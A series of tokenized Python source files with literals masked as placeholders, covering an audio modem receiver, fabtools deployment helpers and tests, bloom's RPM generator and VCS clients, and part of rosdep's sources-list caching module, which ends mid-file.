) <EOL> sender . write ( np . zeros ( int ( Fs * config . silence_stop ) ) ) <EOL> return True <EOL> def recv ( config , src , dst , dump_audio = None , pylab = None ) : <EOL> if dump_audio : <EOL> src = stream . Dumper ( src , dump_audio ) <EOL> reader = stream . Reader ( src , data_type = common . loads ) <EOL> signal = itertools . chain . from_iterable ( reader ) <EOL> log . debug ( '<STR_LIT>' , config . skip_start ) <EOL> common . take ( signal , int ( config . skip_start * config . Fs ) ) <EOL> pylab = pylab or common . Dummy ( ) <EOL> detector = detect . Detector ( config = config , pylab = pylab ) <EOL> receiver = _recv . Receiver ( config = config , pylab = pylab ) <EOL> try : <EOL> log . info ( '<STR_LIT>' , config . Fc / <NUM_LIT> ) <EOL> signal , amplitude , freq_error = detector . run ( signal ) <EOL> freq = <NUM_LIT:1> / ( <NUM_LIT:1.0> + freq_error ) <EOL> log . debug ( '<STR_LIT>' , ( freq - <NUM_LIT:1> ) * <NUM_LIT> ) <EOL> gain = <NUM_LIT:1.0> / amplitude <EOL> log . debug ( '<STR_LIT>' , gain ) <EOL> sampler = sampling . Sampler ( signal , sampling . Interpolator ( ) , freq = freq ) <EOL> receiver . run ( sampler , gain = <NUM_LIT:1.0> / amplitude , output = dst ) <EOL> return True <EOL> except BaseException : <EOL> log . exception ( '<STR_LIT>' ) <EOL> return False <EOL> finally : <EOL> dst . flush ( ) <EOL> receiver . report ( ) </s>
<s> from __future__ import absolute_import <EOL> from dirtyfields . dirtyfields import DirtyFieldsMixin </s>
<s> """<STR_LIT>""" <EOL> from fabric . api import run <EOL> from fabric . api import sudo <EOL> from fabric . context_managers import cd <EOL> from fabtools . utils import run_as_root <EOL> def clone ( remote_url , path = None , use_sudo = False , user = None ) : <EOL> """<STR_LIT>""" <EOL> cmd = '<STR_LIT>' % remote_url <EOL> if path is not None : <EOL> cmd = cmd + '<STR_LIT>' % path <EOL> if use_sudo and user is None : <EOL> run_as_root ( cmd ) <EOL> elif use_sudo : <EOL> sudo ( cmd , user = user ) <EOL> else : <EOL> run ( cmd ) <EOL> def update ( path , branch = "<STR_LIT:default>" , use_sudo = False , user = None , force = False ) : <EOL> """<STR_LIT>""" <EOL> cmd = "<STR_LIT>" % branch <EOL> with cd ( path ) : <EOL> if use_sudo and user is None : <EOL> run_as_root ( cmd ) <EOL> elif use_sudo : <EOL> sudo ( cmd , user = user ) <EOL> else : <EOL> run ( cmd ) <EOL> def pull ( path , use_sudo = False , user = None ) : <EOL> """<STR_LIT>""" <EOL> if not path : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> cmd = '<STR_LIT>' <EOL> with cd ( path ) : <EOL> if use_sudo and user is None : <EOL> run_as_root ( cmd ) <EOL> elif use_sudo : <EOL> sudo ( cmd , user = user ) <EOL> else : <EOL> run ( cmd ) </s>
<s> """<STR_LIT>""" <EOL> from fabtools import nodejs <EOL> def installed_from_source ( version = nodejs . DEFAULT_VERSION ) : <EOL> """<STR_LIT>""" <EOL> if nodejs . version ( ) != version : <EOL> nodejs . install_from_source ( version ) <EOL> def package ( pkg_name , version = None , local = False ) : <EOL> """<STR_LIT>""" <EOL> pkg_version = nodejs . package_version ( pkg_name , local = local ) <EOL> if version : <EOL> if pkg_version != version : <EOL> nodejs . install_package ( pkg_name , version , local = local ) <EOL> else : <EOL> if pkg_version is None : <EOL> nodejs . install_package ( pkg_name , local = local ) </s>
<s> from fabric . api import puts , sudo <EOL> from fabtools . require . files import directory as require_directory <EOL> def test_list_partitions ( ) : <EOL> """<STR_LIT>""" <EOL> from fabtools . disk import partitions <EOL> partitions = partitions ( ) <EOL> for pname , ptype in partitions . items ( ) : <EOL> puts ( "<STR_LIT>" % ( pname , hex ( ptype ) ) ) <EOL> def test_format_and_mount ( ) : <EOL> """<STR_LIT>""" <EOL> from fabtools . disk import ismounted , mkfs , mount <EOL> assert not ismounted ( '<STR_LIT>' ) <EOL> try : <EOL> sudo ( '<STR_LIT>' ) <EOL> sudo ( '<STR_LIT>' ) <EOL> mkfs ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> require_directory ( '<STR_LIT>' , use_sudo = True ) <EOL> mount ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> assert ismounted ( '<STR_LIT>' ) <EOL> sudo ( '<STR_LIT>' ) <EOL> assert not ismounted ( '<STR_LIT>' ) <EOL> finally : <EOL> sudo ( '<STR_LIT>' , quiet = True ) <EOL> sudo ( '<STR_LIT>' , quiet = True ) <EOL> sudo ( '<STR_LIT>' , quiet = True ) </s>
<s> import unittest <EOL> import mock <EOL> class CreateUserTestCase ( unittest . TestCase ) : <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_uid_str ( self , mock_run_as_root ) : <EOL> from fabtools . user import create <EOL> create ( '<STR_LIT>' , uid = '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_uid_int ( self , mock_run_as_root ) : <EOL> from fabtools . user import create <EOL> create ( '<STR_LIT>' , uid = <NUM_LIT> ) </s>
<s> from __future__ import print_function <EOL> import argparse <EOL> import sys <EOL> import pkg_resources <EOL> from bloom . util import add_global_arguments <EOL> from bloom . util import handle_global_arguments <EOL> BLOOM_GENERATE_CMDS_GROUP = '<STR_LIT>' <EOL> def list_generator_commands ( ) : <EOL> generators = [ ] <EOL> for entry_point in pkg_resources . iter_entry_points ( group = BLOOM_GENERATE_CMDS_GROUP ) : <EOL> generators . append ( entry_point . name ) <EOL> return generators <EOL> def load_generator_description ( generator_name ) : <EOL> for entry_point in pkg_resources . iter_entry_points ( group = BLOOM_GENERATE_CMDS_GROUP ) : <EOL> if entry_point . name == generator_name : <EOL> return entry_point . load ( ) <EOL> def create_subparsers ( parser , generator_cmds ) : <EOL> metavar = '<STR_LIT:[>' + '<STR_LIT>' . join ( generator_cmds ) + '<STR_LIT:]>' <EOL> subparser = parser . add_subparsers ( <EOL> title = '<STR_LIT>' , <EOL> metavar = metavar , <EOL> description = '<STR_LIT>' . format ( metavar ) , <EOL> dest = '<STR_LIT>' <EOL> ) <EOL> for generator_cmd in generator_cmds : <EOL> desc = load_generator_description ( generator_cmd ) <EOL> cmd_parser = subparser . add_parser ( desc [ '<STR_LIT:title>' ] , description = desc [ '<STR_LIT:description>' ] ) <EOL> cmd_parser = desc [ '<STR_LIT>' ] ( cmd_parser ) <EOL> cmd_parser . set_defaults ( func = desc [ '<STR_LIT>' ] ) <EOL> add_global_arguments ( cmd_parser ) <EOL> def main ( sysargs = None ) : <EOL> parser = argparse . ArgumentParser ( <EOL> description = "<STR_LIT>" <EOL> ) <EOL> generator_cmds = list_generator_commands ( ) <EOL> create_subparsers ( parser , generator_cmds ) <EOL> args = parser . parse_args ( sysargs ) <EOL> handle_global_arguments ( args ) <EOL> sys . exit ( args . func ( args ) or <NUM_LIT:0> ) </s>
<s> from __future__ import print_function <EOL> import os <EOL> import sys <EOL> import traceback <EOL> from bloom . logging import debug <EOL> from bloom . logging import error <EOL> from bloom . logging import fmt <EOL> from bloom . logging import info <EOL> from bloom . generators . rpm . generator import generate_substitutions_from_package <EOL> from bloom . generators . rpm . generator import place_template_files <EOL> from bloom . generators . rpm . generator import process_template_files <EOL> from bloom . util import get_distro_list_prompt <EOL> try : <EOL> from rosdep2 import create_default_installer_context <EOL> except ImportError : <EOL> debug ( traceback . format_exc ( ) ) <EOL> error ( "<STR_LIT>" , exit = True ) <EOL> try : <EOL> from catkin_pkg . packages import find_packages <EOL> except ImportError : <EOL> debug ( traceback . format_exc ( ) ) <EOL> error ( "<STR_LIT>" , exit = True ) <EOL> def prepare_arguments ( parser ) : <EOL> add = parser . add_argument <EOL> add ( '<STR_LIT>' , nargs = '<STR_LIT:?>' , <EOL> help = "<STR_LIT>" ) <EOL> action = parser . add_mutually_exclusive_group ( required = False ) <EOL> add = action . add_argument <EOL> add ( '<STR_LIT>' , action = '<STR_LIT:store_true>' , <EOL> help = "<STR_LIT>" ) <EOL> add ( '<STR_LIT>' , action = '<STR_LIT:store_true>' , <EOL> help = "<STR_LIT>" ) <EOL> add = parser . add_argument <EOL> add ( '<STR_LIT>' , help = '<STR_LIT>' ) <EOL> add ( '<STR_LIT>' , help = '<STR_LIT>' ) <EOL> add ( '<STR_LIT>' , help = "<STR_LIT>" % get_distro_list_prompt ( ) ) <EOL> return parser <EOL> def get_subs ( pkg , os_name , os_version , ros_distro ) : <EOL> return generate_substitutions_from_package ( <EOL> pkg , <EOL> os_name , <EOL> os_version , <EOL> ros_distro <EOL> ) <EOL> def main ( args = None , get_subs_fn = None ) : <EOL> get_subs_fn = get_subs_fn or get_subs <EOL> _place_template_files = True <EOL> _process_template_files = True <EOL> package_path = os . getcwd ( ) <EOL> if args is not None : <EOL> package_path = args . package_path or os . getcwd ( ) <EOL> _place_template_files = args . place_template_files <EOL> _process_template_files = args . process_template_files <EOL> pkgs_dict = find_packages ( package_path ) <EOL> if len ( pkgs_dict ) == <NUM_LIT:0> : <EOL> sys . exit ( "<STR_LIT>" . format ( package_path ) ) <EOL> if len ( pkgs_dict ) > <NUM_LIT:1> : <EOL> sys . exit ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> os_data = create_default_installer_context ( ) . get_os_name_and_version ( ) <EOL> os_name , os_version = os_data <EOL> ros_distro = os . environ . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> os_name = args . os_name or os_name <EOL> os_version = args . os_version or os_version <EOL> ros_distro = args . ros_distro or ros_distro <EOL> info ( fmt ( "<STR_LIT>" ) + <EOL> fmt ( "<STR_LIT>" % <EOL> ( os_name , os_version , [ p . name for p in pkgs_dict . values ( ) ] ) ) ) <EOL> for path , pkg in pkgs_dict . items ( ) : <EOL> template_files = None <EOL> try : <EOL> subs = get_subs_fn ( pkg , os_name , os_version , ros_distro ) <EOL> if _place_template_files : <EOL> place_template_files ( path ) <EOL> if _process_template_files : <EOL> template_files = process_template_files ( path , subs ) <EOL> if not _place_template_files and not _process_template_files : <EOL> place_template_files ( path ) <EOL> template_files = process_template_files ( path , subs ) <EOL> if template_files is not None : <EOL> for template_file in template_files : <EOL> os . remove ( os . path . normpath ( template_file ) ) <EOL> except Exception as exc : <EOL> debug ( traceback . format_exc ( ) ) <EOL> error ( type ( exc ) . __name__ + "<STR_LIT>" + str ( exc ) , exit = True ) <EOL> except ( KeyboardInterrupt , EOFError ) : <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> description = dict ( <EOL> title = '<STR_LIT>' , <EOL> description = "<STR_LIT>" , <EOL> main = main , <EOL> prepare_arguments = prepare_arguments <EOL> ) </s>
<s> '''<STR_LIT>''' <EOL> import os <EOL> import re <EOL> import shutil <EOL> import subprocess <EOL> import tempfile <EOL> class Tag ( object ) : <EOL> def __init__ ( self , name , timestamp = None ) : <EOL> self . name = name <EOL> self . timestamp = timestamp <EOL> class LogEntry ( object ) : <EOL> def __init__ ( self , msg , affected_paths , author ) : <EOL> self . msg = msg <EOL> self . author = author <EOL> self . _affected_paths = [ p for p in affected_paths if p ] <EOL> def affects_path ( self , path ) : <EOL> for apath in self . _affected_paths : <EOL> if path == '<STR_LIT:.>' : <EOL> return True <EOL> if apath . startswith ( os . path . join ( path , '<STR_LIT>' ) ) : <EOL> return True <EOL> return False <EOL> class VcsClientBase ( object ) : <EOL> def __init__ ( self , path ) : <EOL> self . path = path <EOL> def get_tags ( self ) : <EOL> raise NotImplementedError ( ) <EOL> def get_latest_tag_name ( self ) : <EOL> raise NotImplementedError ( ) <EOL> def get_log_entries ( self , from_tag , to_tag , skip_merges = False ) : <EOL> raise NotImplementedError ( ) <EOL> def replace_repository_references ( self , line ) : <EOL> return line <EOL> def _find_executable ( self , file_name ) : <EOL> for path in os . getenv ( '<STR_LIT>' ) . split ( os . path . pathsep ) : <EOL> file_path = os . path . join ( path , file_name ) <EOL> if os . path . isfile ( file_path ) : <EOL> return file_path <EOL> return None <EOL> def _run_command ( self , cmd , env = None ) : <EOL> cwd = os . path . abspath ( self . path ) <EOL> result = { '<STR_LIT>' : '<STR_LIT:U+0020>' . join ( cmd ) , '<STR_LIT>' : cwd } <EOL> try : <EOL> proc = subprocess . Popen ( cmd , cwd = cwd , stdout = subprocess . PIPE , stderr = subprocess . STDOUT , env = env ) <EOL> output , _ = proc . communicate ( ) <EOL> result [ '<STR_LIT>' ] = output . rstrip ( ) <EOL> result [ '<STR_LIT>' ] = proc . returncode <EOL> except subprocess . CalledProcessError as e : <EOL> result [ '<STR_LIT>' ] = e . output <EOL> result [ '<STR_LIT>' ] = e . returncode <EOL> return result <EOL> def _truncate_timestamps ( self , tags ) : <EOL> lengths = [ <NUM_LIT:10> , <NUM_LIT:16> , <NUM_LIT> ] <EOL> for length in lengths : <EOL> considered_tags = [ t for t in tags if len ( t . timestamp ) > length ] <EOL> grouped_by_timestamp = { } <EOL> for t in considered_tags : <EOL> truncated_timestamp = t . timestamp [ : length ] <EOL> if truncated_timestamp not in grouped_by_timestamp : <EOL> grouped_by_timestamp [ truncated_timestamp ] = [ ] <EOL> grouped_by_timestamp [ truncated_timestamp ] . append ( t ) <EOL> for truncated_timestamp , similar_tags in grouped_by_timestamp . items ( ) : <EOL> if len ( similar_tags ) == <NUM_LIT:1> : <EOL> similar_tags [ <NUM_LIT:0> ] . timestamp = truncated_timestamp <EOL> class GitClient ( VcsClientBase ) : <EOL> type = '<STR_LIT>' <EOL> def __init__ ( self , path ) : <EOL> super ( GitClient , self ) . __init__ ( path ) <EOL> self . _executable = self . _find_executable ( '<STR_LIT>' ) <EOL> self . _repo_hosting = None <EOL> self . _github_base_url = '<STR_LIT>' <EOL> self . _github_path = None <EOL> def _get_author ( self , hash_ ) : <EOL> cmd = [ self . _executable , '<STR_LIT>' , hash_ , '<STR_LIT>' , '<STR_LIT:1>' , '<STR_LIT>' ] <EOL> result = self . _run_command ( cmd ) <EOL> if result [ '<STR_LIT>' ] : <EOL> raise RuntimeError ( '<STR_LIT>' % result [ '<STR_LIT>' ] ) <EOL> return result [ '<STR_LIT>' ] <EOL> def get_tags ( self ) : <EOL> cmd_tag = [ self . _executable , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> result_tag = self . _run_command ( cmd_tag ) <EOL> if result_tag [ '<STR_LIT>' ] : <EOL> raise RuntimeError ( '<STR_LIT>' % result_tag [ '<STR_LIT>' ] ) <EOL> decorations = '<STR_LIT:U+002CU+0020>' . join ( re . findall ( '<STR_LIT>' , result_tag [ '<STR_LIT>' ] , re . MULTILINE ) ) + '<STR_LIT:U+002C>' <EOL> tag_names = re . findall ( '<STR_LIT>' , decorations ) <EOL> tags = [ ] <EOL> for tag_name in tag_names : <EOL> cmd = [ self . _executable , '<STR_LIT>' , tag_name , '<STR_LIT>' , '<STR_LIT:1>' , '<STR_LIT>' ] <EOL> result = self . _run_command ( cmd ) <EOL> if result [ '<STR_LIT>' ] : <EOL> raise RuntimeError ( '<STR_LIT>' % result [ '<STR_LIT>' ] ) <EOL> tags . append ( Tag ( tag_name , result [ '<STR_LIT>' ] ) ) <EOL> self . _truncate_timestamps ( tags ) <EOL> return tags <EOL> def get_latest_tag_name ( self ) : <EOL> cmd_describe = [ self . _executable , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> result_describe = self . _run_command ( cmd_describe ) <EOL> if result_describe [ '<STR_LIT>' ] : <EOL> raise RuntimeError ( '<STR_LIT>' % result_describe [ '<STR_LIT>' ] ) <EOL> tag_name = result_describe [ '<STR_LIT>' ] <EOL> return tag_name <EOL> def get_log_entries ( self , from_tag , to_tag , skip_merges = False ) : <EOL> cmd = [ self . _executable , '<STR_LIT>' ] <EOL> if from_tag or to_tag : <EOL> cmd . append ( '<STR_LIT>' % ( '<STR_LIT>' % to_tag if to_tag else '<STR_LIT>' , from_tag if from_tag else '<STR_LIT>' ) ) <EOL> cmd . append ( '<STR_LIT>' ) <EOL> if skip_merges : <EOL> cmd . append ( '<STR_LIT>' ) <EOL> result = self . _run_command ( cmd ) <EOL> if result [ '<STR_LIT>' ] : <EOL> raise RuntimeError ( '<STR_LIT>' % result [ '<STR_LIT>' ] ) <EOL> log_entries = [ ] <EOL> if result [ '<STR_LIT>' ] : <EOL> hashes = result [ '<STR_LIT>' ] . splitlines ( ) <EOL> for hash_ in hashes : <EOL> cmd = [ self . _executable , '<STR_LIT>' , hash_ , '<STR_LIT>' , '<STR_LIT:1>' , '<STR_LIT>' ] <EOL> result = self . _run_command ( cmd ) <EOL> if result [ '<STR_LIT>' ] : <EOL> raise RuntimeError ( '<STR_LIT>' % result [ '<STR_LIT>' ] ) <EOL> if result [ '<STR_LIT>' ] == from_tag : <EOL> continue <EOL> msg = result [ '<STR_LIT>' ] <EOL> cmd = [ self . _executable , '<STR_LIT>' , hash_ , '<STR_LIT>' , '<STR_LIT>' ] <EOL> result = self . _run_command ( cmd ) <EOL> if result [ '<STR_LIT>' ] : <EOL> raise RuntimeError ( '<STR_LIT>' % result [ '<STR_LIT>' ] ) <EOL> affected_paths = result [ '<STR_LIT>' ] . splitlines ( ) <EOL> log_entries . append ( LogEntry ( msg , affected_paths , self . _get_author ( hash_ ) ) ) <EOL> return log_entries <EOL> def replace_repository_references ( self , line ) : <EOL> if self . _repo_hosting is None : <EOL> self . _repo_hosting = False <EOL> try : <EOL> self . _determine_repo_hosting ( ) <EOL> except RuntimeError : <EOL> pass <EOL> if self . _repo_hosting == '<STR_LIT>' : <EOL> line = self . _replace_github_issue_references ( line ) <EOL> return line <EOL> def _determine_repo_hosting ( self ) : <EOL> cmd = [ self . _executable , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> result = self . _run_command ( cmd ) <EOL> if result [ '<STR_LIT>' ] : <EOL> raise RuntimeError ( '<STR_LIT>' % result [ '<STR_LIT>' ] ) <EOL> prefixes = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> for prefix in prefixes : <EOL> if result [ '<STR_LIT>' ] . startswith ( prefix ) : <EOL> self . _repo_hosting = '<STR_LIT>' <EOL> path = result [ '<STR_LIT>' ] [ len ( prefix ) : ] <EOL> if path . endswith ( '<STR_LIT>' ) : <EOL> path = path [ : - <NUM_LIT:4> ] <EOL> self . _github_path = path <EOL> break <EOL> def _replace_github_issue_references ( self , line ) : <EOL> valid_name = '<STR_LIT>' <EOL> issue_pattern = '<STR_LIT>' <EOL> def replace_issue_number ( match ) : <EOL> issue_url = self . _github_base_url <EOL> if match . group ( <NUM_LIT:1> ) : <EOL> path = match . group ( <NUM_LIT:1> ) <EOL> issue_url += path <EOL> else : <EOL> path = '<STR_LIT>' <EOL> issue_url += self . _github_path <EOL> issue_number = match . group ( <NUM_LIT:2> ) <EOL> issue_url += '<STR_LIT>' + issue_number <EOL> return '<STR_LIT>' % ( path , issue_number , issue_url ) <EOL> line = re . sub ( ( '<STR_LIT>' % ( valid_name , valid_name ) ) + issue_pattern , replace_issue_number , line ) <EOL> return line <EOL> class HgClient ( VcsClientBase ) : <EOL> type = '<STR_LIT>' <EOL> def __init__ ( self , path ) : <EOL> super ( HgClient , self ) . __init__ ( path ) <EOL> self . _executable = self . _find_executable ( '<STR_LIT>' ) <EOL> def _get_author ( self , hash_ ) : <EOL> cmd = [ self . _executable , '<STR_LIT>' , '<STR_LIT>' , hash_ , '<STR_LIT>' , '<STR_LIT>' ] <EOL> result = self . _run_command ( cmd ) <EOL> if result [ '<STR_LIT>' ] : <EOL> raise RuntimeError ( '<STR_LIT>' % result [ '<STR_LIT>' ] ) <EOL> return result [ '<STR_LIT>' ] <EOL> def get_tags ( self ) : <EOL> cmd_tag = [ self . _executable , '<STR_LIT>' , '<STR_LIT>' ] <EOL> result_tag = self . _run_command ( cmd_tag ) <EOL> if result_tag [ '<STR_LIT>' ] : <EOL> raise RuntimeError ( '<STR_LIT>' % result_tag [ '<STR_LIT>' ] ) <EOL> tag_names = result_tag [ '<STR_LIT>' ] . splitlines ( ) <EOL> tags = [ ] <EOL> for tag_name in tag_names : <EOL> cmd = [ self . _executable , '<STR_LIT>' , '<STR_LIT>' , tag_name , '<STR_LIT>' , '<STR_LIT>' ] <EOL> result = self . _run_command ( cmd ) <EOL> if result [ '<STR_LIT>' ] : <EOL> raise RuntimeError ( '<STR_LIT>' % result [ '<STR_LIT>' ] ) <EOL> tags . append ( Tag ( tag_name , result [ '<STR_LIT>' ] ) ) <EOL> self . _truncate_timestamps ( tags ) <EOL> return tags <EOL> def get_latest_tag_name ( self ) : <EOL> cmd_log = [ self . _executable , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:.>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> result_log = self . _run_command ( cmd_log ) <EOL> if result_log [ '<STR_LIT>' ] : <EOL> raise RuntimeError ( '<STR_LIT>' % result_log [ '<STR_LIT>' ] ) <EOL> tag_name = result_log [ '<STR_LIT>' ] <EOL> return tag_name <EOL> def get_log_entries ( self , from_tag , to_tag , skip_merges = False ) : <EOL> revrange = '<STR_LIT>' % ( ( to_tag if to_tag else '<STR_LIT>' ) , ( from_tag if from_tag else '<STR_LIT>' ) ) <EOL> if to_tag : <EOL> revrange += '<STR_LIT>' % to_tag <EOL> if from_tag : <EOL> revrange += '<STR_LIT>' % from_tag <EOL> cmd = [ self . _executable , '<STR_LIT>' , '<STR_LIT>' , revrange , '<STR_LIT>' , '<STR_LIT>' ] <EOL> result = self . _run_command ( cmd ) <EOL> if result [ '<STR_LIT>' ] : <EOL> raise RuntimeError ( '<STR_LIT>' % result [ '<STR_LIT>' ] ) <EOL> tmp_base = tempfile . mkdtemp ( '<STR_LIT>' ) <EOL> try : <EOL> style_file = os . path . join ( tmp_base , '<STR_LIT>' ) <EOL> with open ( style_file , '<STR_LIT:w>' ) as f : <EOL> f . write ( "<STR_LIT>" ) <EOL> f . write ( "<STR_LIT>" ) <EOL> log_entries = [ ] <EOL> if result [ '<STR_LIT>' ] : <EOL> revs = reversed ( result [ '<STR_LIT>' ] . splitlines ( ) ) <EOL> for rev in revs : <EOL> cmd = [ self . _executable , '<STR_LIT>' , '<STR_LIT>' , rev , '<STR_LIT>' , '<STR_LIT:1>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> result = self . _run_command ( cmd ) <EOL> if result [ '<STR_LIT>' ] : <EOL> raise RuntimeError ( '<STR_LIT>' % result [ '<STR_LIT>' ] ) <EOL> if result [ '<STR_LIT>' ] == from_tag : <EOL> continue <EOL> msg = result [ '<STR_LIT>' ] <EOL> cmd = [ self . _executable , '<STR_LIT>' , '<STR_LIT>' , rev , '<STR_LIT>' , '<STR_LIT:1>' , '<STR_LIT>' , style_file ] <EOL> result = self . _run_command ( cmd ) <EOL> if result [ '<STR_LIT>' ] : <EOL> raise RuntimeError ( '<STR_LIT>' % result [ '<STR_LIT>' ] ) <EOL> affected_paths = result [ '<STR_LIT>' ] . splitlines ( ) <EOL> log_entries . append ( LogEntry ( msg , affected_paths , self . _get_author ( rev ) ) ) <EOL> finally : <EOL> shutil . rmtree ( tmp_base ) <EOL> return log_entries <EOL> def get_vcs_client ( base_path ) : <EOL> vcs_clients = [ ] <EOL> vcs_clients . append ( GitClient ) <EOL> vcs_clients . append ( HgClient ) <EOL> client_types = [ c . type for c in vcs_clients ] <EOL> if len ( client_types ) != len ( set ( client_types ) ) : <EOL> raise RuntimeError ( '<STR_LIT>' % '<STR_LIT:U+002CU+0020>' . join ( sorted ( client_types ) ) ) <EOL> for vcs_client in vcs_clients : <EOL> if os . path . exists ( os . path . join ( base_path , '<STR_LIT>' % vcs_client . type ) ) : <EOL> return vcs_client ( base_path ) <EOL> raise RuntimeError ( '<STR_LIT>' % '<STR_LIT:U+002CU+0020>' . join ( [ c . type for c in vcs_clients ] ) ) </s>
<s> __version__ = '<STR_LIT>' </s>
<s> from __future__ import print_function <EOL> import os <EOL> import sys <EOL> import tempfile <EOL> import yaml <EOL> import hashlib <EOL> try : <EOL> from urllib . request import urlopen <EOL> from urllib . error import URLError <EOL> except ImportError : <EOL> from urllib2 import urlopen <EOL> from urllib2 import URLError <EOL> try : <EOL> import cPickle as pickle <EOL> except ImportError : <EOL> import pickle <EOL> from . core import InvalidData , DownloadFailure , CachePermissionError <EOL> from . gbpdistro_support import get_gbprepo_as_rosdep_data , download_gbpdistro_as_rosdep_data <EOL> try : <EOL> import urlparse <EOL> except ImportError : <EOL> import urllib . parse as urlparse <EOL> try : <EOL> import httplib <EOL> except ImportError : <EOL> import http . client as httplib <EOL> import rospkg <EOL> import rospkg . distro <EOL> from . loader import RosdepLoader <EOL> from . rosdistrohelper import get_index , get_index_url <EOL> DEFAULT_SOURCES_LIST_URL = '<STR_LIT>' <EOL> DOWNLOAD_TIMEOUT = <NUM_LIT> <EOL> SOURCES_LIST_DIR = '<STR_LIT>' <EOL> SOURCES_CACHE_DIR = '<STR_LIT>' <EOL> CACHE_INDEX = '<STR_LIT:index>' <EOL> PICKLE_CACHE_EXT = '<STR_LIT>' <EOL> SOURCE_PATH_ENV = '<STR_LIT>' <EOL> def get_sources_list_dirs ( source_list_dir ) : <EOL> if SOURCE_PATH_ENV in os . environ : <EOL> sdirs = os . environ [ SOURCE_PATH_ENV ] . split ( os . pathsep ) <EOL> else : <EOL> sdirs = [ source_list_dir ] <EOL> for p in list ( sdirs ) : <EOL> if not os . path . exists ( p ) : <EOL> sdirs . remove ( p ) <EOL> return sdirs <EOL> def get_sources_list_dir ( ) : <EOL> if <NUM_LIT:0> : <EOL> etc_ros = rospkg . get_etc_ros_dir ( ) <EOL> else : <EOL> etc_ros = '<STR_LIT>' <EOL> sys_sources_list_dir = os . path . join ( etc_ros , '<STR_LIT>' , SOURCES_LIST_DIR ) <EOL> sources_list_dirs = get_sources_list_dirs ( sys_sources_list_dir ) <EOL> if sources_list_dirs : <EOL> return sources_list_dirs [ <NUM_LIT:0> ] <EOL> else : <EOL> return sys_sources_list_dir <EOL> def get_default_sources_list_file ( ) : <EOL> return os . path . join ( get_sources_list_dir ( ) , '<STR_LIT>' ) <EOL> def get_sources_cache_dir ( ) : <EOL> ros_home = rospkg . get_ros_home ( ) <EOL> return os . path . join ( ros_home , '<STR_LIT>' , SOURCES_CACHE_DIR ) <EOL> TYPE_YAML = '<STR_LIT>' <EOL> TYPE_GBPDISTRO = '<STR_LIT>' <EOL> VALID_TYPES = [ TYPE_YAML , TYPE_GBPDISTRO ] <EOL> class DataSource ( object ) : <EOL> def __init__ ( self , type_ , url , tags , origin = None ) : <EOL> """<STR_LIT>""" <EOL> if not type_ in VALID_TYPES : <EOL> raise ValueError ( "<STR_LIT>" % ( '<STR_LIT:U+002C>' . join ( VALID_TYPES ) ) ) <EOL> parsed = urlparse . urlparse ( url ) <EOL> if not parsed . scheme or ( parsed . scheme != '<STR_LIT:file>' and not parsed . netloc ) or parsed . path in ( '<STR_LIT>' , '<STR_LIT:/>' ) : <EOL> raise ValueError ( "<STR_LIT>" % ( str ( url ) ) ) <EOL> if not type ( tags ) == list : <EOL> raise ValueError ( "<STR_LIT>" % ( str ( tags ) ) ) <EOL> self . type = type_ <EOL> self . tags = tags <EOL> self . url = url <EOL> self . origin = origin <EOL> def __eq__ ( self , other ) : <EOL> return isinstance ( other , DataSource ) and self . type == other . type and self . tags == other . tags and self . url == other . url and self . origin == other . origin <EOL> def __str__ ( self ) : <EOL> if self . origin : <EOL> return "<STR_LIT>" % ( self . origin , self . type , self . url , '<STR_LIT:U+0020>' . join ( self . tags ) ) <EOL> else : <EOL> return "<STR_LIT>" % ( self . type , self . url , '<STR_LIT:U+0020>' . join ( self . tags ) ) <EOL> def __repr__ ( self ) : <EOL> return repr ( ( self . type , self . url , self . tags , self . origin ) ) <EOL> class RosDistroSource ( DataSource ) : <EOL> def __init__ ( self , distro ) : <EOL> self . type = TYPE_GBPDISTRO <EOL> self . tags = [ distro ] <EOL> self . url = get_index ( ) . distributions [ distro ] [ '<STR_LIT>' ] <EOL> self . origin = None <EOL> def cache_data_source_loader ( sources_cache_dir , verbose = False ) : <EOL> def create_model ( type_ , uri , tags , origin = None ) : <EOL> filename = compute_filename_hash ( uri ) <EOL> filepath = os . path . join ( sources_cache_dir , filename ) <EOL> pickle_filepath = filepath + PICKLE_CACHE_EXT <EOL> if os . path . exists ( pickle_filepath ) : <EOL> if verbose : <EOL> print ( "<STR_LIT>" % ( uri , pickle_filepath ) , file = sys . stderr ) <EOL> with open ( pickle_filepath , '<STR_LIT:rb>' ) as f : <EOL> rosdep_data = pickle . loads ( f . read ( ) ) <EOL> elif os . path . exists ( filepath ) : <EOL> if verbose : <EOL> print ( "<STR_LIT>" % ( uri , filepath ) , file = sys . stderr ) <EOL> with open ( filepath ) as f : <EOL> rosdep_data = yaml . load ( f . read ( ) ) <EOL> else : <EOL> rosdep_data = { } <EOL> return CachedDataSource ( type_ , uri , tags , rosdep_data , origin = filepath ) <EOL> return create_model <EOL> class CachedDataSource ( object ) : <EOL> def __init__ ( self , type_ , url , tags , rosdep_data , origin = None ) : <EOL> """<STR_LIT>""" <EOL> self . source = DataSource ( type_ , url , tags , origin = origin ) <EOL> self . rosdep_data = rosdep_data <EOL> def __eq__ ( self , other ) : <EOL> try : <EOL> return self . source == other . source and self . rosdep_data == other . rosdep_data <EOL> except AttributeError : <EOL> return False <EOL> def __str__ ( self ) : <EOL> return "<STR_LIT>" % ( self . source , self . rosdep_data ) <EOL> def __repr__ ( self ) : <EOL> return repr ( ( self . type , self . url , self . tags , self . rosdep_data , self . origin ) ) <EOL> @ property <EOL> def type ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . source . type <EOL> @ property <EOL> def url ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . source . url <EOL> @ property <EOL> def tags ( 